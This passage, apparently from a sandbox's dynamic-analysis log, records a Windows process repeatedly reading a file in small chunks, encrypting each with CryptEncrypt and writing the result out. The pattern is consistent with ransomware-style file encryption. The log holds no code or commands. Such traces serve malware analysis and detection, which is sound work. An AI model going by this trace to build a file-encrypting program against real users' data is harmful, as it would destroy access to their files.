lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.367] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.367] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.367] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.368] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.368] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.368] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.368] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.368] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.368] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.368] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.368] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.368] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.368] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.368] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.369] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.369] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.369] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.369] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.369] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.369] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.369] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.369] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.369] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.370] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.370] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.370] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.370] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.370] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.370] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.370] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.370] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.370] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.370] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.370] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.371] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.371] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.371] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.371] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.371] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.371] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.371] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.371] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.371] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.371] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.371] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.371] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.372] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.372] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.372] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.372] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.372] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.372] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.372] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.372] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.372] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.372] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.372] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.373] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.373] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.373] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.373] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.373] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.373] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.373] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.373] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.373] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.374] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.374] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.374] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.374] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.374] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.374] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.374] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.375] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.375] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.375] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.375] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.375] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.375] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.375] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.375] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.375] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.375] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.375] WriteFile (in: 